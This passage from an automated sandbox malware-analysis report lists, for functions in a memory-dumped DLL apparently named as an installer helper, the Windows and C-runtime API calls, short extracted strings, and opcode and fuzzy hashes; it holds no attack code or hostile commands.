                                • GetLastError.KERNEL32(?,?,?,6CA1AC7F,6CA1B0D0,?,00000000,6C8D1DEA,?,6CA2469E,6CA1B0D0,000000FF,000000FF,00000002,00008000,6CA1B0D0), ref: 6CA1ADD3
                                • __dosmaperr.LIBCMT ref: 6CA1ADDA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer__dosmaperr
                                • String ID: 8Q
                                • API String ID: 2336955059-4022487301
                                • Opcode ID: c4586d260e706f0e3ca8245fcda8ddea5c674623dab206ecab296aa418a468e5
                                • Instruction ID: 2d86e12ed1c80bf46c2c01c50ef5f8b312b3c86796f4015be95e329871efb5ac
                                • Opcode Fuzzy Hash: c4586d260e706f0e3ca8245fcda8ddea5c674623dab206ecab296aa418a468e5
                                • Instruction Fuzzy Hash: 8E01FC337149156FCF058FA9DD059DE3F3AEB863657380208E811D7A80EB71DD898B90
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: <J$DJ$HJ$TJ$]
                                • API String ID: 0-686860805
                                • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                • Instruction ID: 60a2b6a2ac5620af9fa44ed0106bd20f4cd5dd4d9fd27fbb98360124f1fc9065
                                • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                • Instruction Fuzzy Hash: 2741D931D01259AFCF14CFE0F5908EEB771AF11309B98C269D52157950EB35AADDCB11
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv
                                • String ID:
                                • API String ID: 3732870572-0
                                • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                • Instruction ID: 206fab89cb97eedb107eae6a8c39ffb2b9d2e95767d5afd83915e0480c7c7951
                                • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                • Instruction Fuzzy Hash: B911D2B6200204BFEB244EA0DC44EAF7BBDEFC5714F50C42DB14192B90C671AC98C760
                                APIs
                                • GetLastError.KERNEL32(?,?,?,6CA0EF64,6CA36DD8,0000000C), ref: 6CA149B7
                                • _free.LIBCMT ref: 6CA14A14
                                • _free.LIBCMT ref: 6CA14A4A
                                • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6CA0EF64,6CA36DD8,0000000C), ref: 6CA14A55
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorLast_free
                                • String ID:
                                • API String ID: 2283115069-0
                                • Opcode ID: 4d19fd21a5b1d46e1c3057688a5c8220d9f3671a65b5261946e98c66bf9bea9f
                                • Instruction ID: 2713724336eace6941e54e5638309e69ecfe7f7b6067948df93db0452917a2cf
                                • Opcode Fuzzy Hash: 4d19fd21a5b1d46e1c3057688a5c8220d9f3671a65b5261946e98c66bf9bea9f
                                • Instruction Fuzzy Hash: D811C67234C6056BDB115ABD5D88D9A25B9DBC277CB2A0728F524E7FC0EF218C8D4118
                                APIs
                                • WriteConsoleW.KERNEL32(00000000,?,6CA246EC,00000000,00000000,?,6CA24B51,00000000,00000001,00000000,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0), ref: 6CA25ED1
                                • GetLastError.KERNEL32(?,6CA24B51,00000000,00000001,00000000,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0,?,6CA1B0D0,?,6CA1BD1C,6CA25AB6), ref: 6CA25EDD
                                  • Part of subcall function 6CA25F2E: CloseHandle.KERNEL32(FFFFFFFE,6CA25EED,?,6CA24B51,00000000,00000001,00000000,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0,?,6CA1B0D0), ref: 6CA25F3E
                                • ___initconout.LIBCMT ref: 6CA25EED
                                  • Part of subcall function 6CA25F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CA25EAB,6CA24B3E,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0,?), ref: 6CA25F22
                                • WriteConsoleW.KERNEL32(00000000,?,6CA246EC,00000000,?,6CA24B51,00000000,00000001,00000000,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0,?), ref: 6CA25F02
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                • String ID:
                                • API String ID: 2744216297-0
                                • Opcode ID: 52a34de41542eb76e0d1d08d5cc1129b8c255897378c48c7b512dd2b95f28371
                                • Instruction ID: d8a3dee3bcda9671662d7af6185e38640518925772f961bb8d1b2043091dfc66
                                • Opcode Fuzzy Hash: 52a34de41542eb76e0d1d08d5cc1129b8c255897378c48c7b512dd2b95f28371
                                • Instruction Fuzzy Hash: B1F01C36600225BBCF221FA1DC089893F76FB097A1B0C4110FA1986628CB328C64DB90
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA3E077
                                  • Part of subcall function 6CA3DFF5: __EH_prolog.LIBCMT ref: 6CA3DFFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: :$\
                                • API String ID: 3519838083-1166558509
                                • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                • Instruction ID: 17e88c9069246f281d26499a41da26ff2999a0f9d7649966c0c265d2a16cd68b
                                • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                • Instruction Fuzzy Hash: A7E1DF309002289ACF10CFA4CAB0BEDB7B1AF15318F146119D45DEBA90EB75ADCDCB95
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog__aullrem
                                • String ID: d%K
                                • API String ID: 3415659256-3110269457
                                • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                • Instruction ID: f0f030efa6c0d1de6152daea2fe5ce3b8bfd54690599cddaa8b169cd07fbeb98
                                • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                • Instruction Fuzzy Hash: 3E81C072A022099BDF04CF94C554BDEB7F6AF44348F288059D818AB6C1D775ED89CB90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog3_
                                • String ID: 8Q
                                • API String ID: 2427045233-4022487301
                                • Opcode ID: 1a4d2d2951efa27bf150f1ab12702f51115672f2080d74873346563693305df9
                                • Instruction ID: e5d59af813925fbf357680a0b01791dac03ade34852d78a3935911ee246ffe98
                                • Opcode Fuzzy Hash: 1a4d2d2951efa27bf150f1ab12702f51115672f2080d74873346563693305df9
                                • Instruction Fuzzy Hash: EF71E870D0A2969FDB118F95C980BFE7BB5AF05358F1C4219E8A0A7E80DF7588C5CB64
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$hfJ
                                • API String ID: 3519838083-1391159562
                                • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                • Instruction ID: 5eaaf4231fac2dd5b3c6a98fcea35144440b00b3dfec01493dea0685290faabb
                                • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                • Instruction Fuzzy Hash: 2C913A70911258EFCB10DF9AC9949DEFBF4FF18308F54452EE196A7A90D770A989CB20
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA58C5D
                                  • Part of subcall function 6CA5761A: __EH_prolog.LIBCMT ref: 6CA5761F
                                  • Part of subcall function 6CA57A2E: __EH_prolog.LIBCMT ref: 6CA57A33
                                  • Part of subcall function 6CA58EA5: __EH_prolog.LIBCMT ref: 6CA58EAA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: WZJ
                                • API String ID: 3519838083-1089469559
                                • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                • Instruction ID: 239734ea150cb817b8d83494a486e15b6503462b096e30fd588bf48e5ade28f9
                                • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                • Instruction Fuzzy Hash: 89814931D00159DFCB15DFA4DA90ADDB7B5AF18318F10809AE416A7BA0DB30AE9DCB61
                                APIs
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 6C8D2A76
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ___std_exception_destroy
                                • String ID: Jbx$Jbx
                                • API String ID: 4194217158-1161259238
                                • Opcode ID: 8895e4675a5912c85474dbb281719596035703ca5fe94c4502817475dfd2dd34
                                • Instruction ID: 2261af23b0bbb3dbd2585f77fbc5c0962ef3467ce33a4bd95ce22fef50cc60c7
                                • Opcode Fuzzy Hash: 8895e4675a5912c85474dbb281719596035703ca5fe94c4502817475dfd2dd34
                                • Instruction Fuzzy Hash: AB513BB19002049FCB20CF68D98499EBBB5FF89318F15897DE8459B741D339ED89CB91
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: <dJ$Q
                                • API String ID: 3519838083-2252229148
                                • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                • Instruction ID: b7f1a3d2f2f825ec038c506d3d7260ba0c43bf436a8b5d91cc278869a17f1c6e
                                • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                • Instruction Fuzzy Hash: 0B516A70900299EFCF00DFE5C9908EDB7B1BF49318F14852EE516ABA50D7319AC9CB14
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $D^J
                                • API String ID: 3519838083-3977321784
                                • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                • Instruction ID: 3aa6ba2b06a67971576865cb4707e4f349590458be6edea51391a04b62ee77b0
                                • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                • Instruction Fuzzy Hash: 7F419B24E055986FD7238E39A590BE8BBA19F06349F9CC358C09647E85DBB409EFC390
                                APIs
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CA246D6), ref: 6CA1D01B
                                • __dosmaperr.LIBCMT ref: 6CA1D022
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorLast__dosmaperr
                                • String ID: 8Q
                                • API String ID: 1659562826-4022487301
                                • Opcode ID: 5c73082a4a809d203edb999e8730aefc8054648d3cb326b1e9c873807f17ea1e
                                • Instruction ID: d63a2fbe3a381ed79c4e637ea339e2a6dfbd9db51983c2a1b4d4f8070d256639
                                • Opcode Fuzzy Hash: 5c73082a4a809d203edb999e8730aefc8054648d3cb326b1e9c873807f17ea1e
                                • Instruction Fuzzy Hash: 10419B7170C2A4AFD7119F6CC880BA97FB5EF4634CF184269E8818BE41D3719D9AC790
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: X&L$p|J
                                • API String ID: 3519838083-2944591232
                                • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                • Instruction ID: 8f3564feb2f0ec92589b81d368487330f2922f65a9f28c7b9879712f8bd1f260
                                • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                • Instruction Fuzzy Hash: 28315039A95115C7D730AB68DE11BAE7771FB11329F14012AD514E6EE0DF6089CACBF0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: 0|J$`)L
                                • API String ID: 3519838083-117937767
                                • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                • Instruction ID: dd717e6560ca48f64610985f58771201d96761fc0235c334e8465c4dbf3eab9c
                                • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                • Instruction Fuzzy Hash: 3F41C335201740EFDB218FB4C6A07EABBE6FF45308F04442EE49A9B751CB316888CB61
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv
                                • String ID: 3333
                                • API String ID: 3732870572-2924271548
                                • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                • Instruction ID: 1444173544909f4a66445c8c05d6f35ed1132b5ff86fec8de64eec9d148cee91
                                • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                • Instruction Fuzzy Hash: 5321B7B49007446FD734CFA98980B6BBAFDFB84714F50892EA146D3B41D770A9888B65
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$LuJ
                                • API String ID: 3519838083-205571748
                                • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                • Instruction ID: 9aa779c187951156b7c8cc1f8eccf30b236774744b34171e88e02e278683154f
                                • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                • Instruction Fuzzy Hash: AE0161B1E01249DADB20DFD984905AEF7B4FF59304F40C42EE569E3A40C3745948CB65
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$xMJ
                                • API String ID: 3519838083-951924499
                                • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                • Instruction ID: 7525e7a82baa5b67f69b3d408ccc2e68f4ac4318787d37e1cc16e10be326a2e7
                                • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                • Instruction Fuzzy Hash: C7117971A00209DBCB00DF99C4905AEB7B4FF5C348B50C82EE469E7B00D7389A89CB95
                                APIs
                                • _free.LIBCMT ref: 6CA1DD49
                                • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CA1A63A,?,00000004,?,4B42FCB6,?,?,6CA0F78C,4B42FCB6,?), ref: 6CA1DD85
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: AllocHeap_free
                                • String ID: 8Q
                                • API String ID: 1080816511-4022487301
                                • Opcode ID: e67178b232d603cfe46ec91e7fa2a993947b8f690e8ae2ea5632e3817a96be18
                                • Instruction ID: 4a9deb7acc6d8aef9d60b063b101f7f68cbc17a1c6998fe5ee6c3e44190e4893
                                • Opcode Fuzzy Hash: e67178b232d603cfe46ec91e7fa2a993947b8f690e8ae2ea5632e3817a96be18
                                • Instruction Fuzzy Hash: 51F0C831A6F21567DF221A2AAC44B9A37789FC36B8B194219E9149BE90DF20C4C5C5E4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prologctype
                                • String ID: |zJ
                                • API String ID: 3037903784-3782439380
                                • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                • Instruction ID: cf3408989b9bdde857e0d9a86ad6370eac219a64c35f9f45ae1080eb635fcfc8
                                • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                • Instruction Fuzzy Hash: E7E0E536606520ABE7298F48C91079DF3A4FF54B15F12401FD052A3A40CBB0A8548691
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prologctype
                                • String ID: <oJ
                                • API String ID: 3037903784-2791053824
                                • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                • Instruction ID: b88108562dba15abd06eefc1e5740e28b9d084e48cbc89591ce1a4d0658ba940
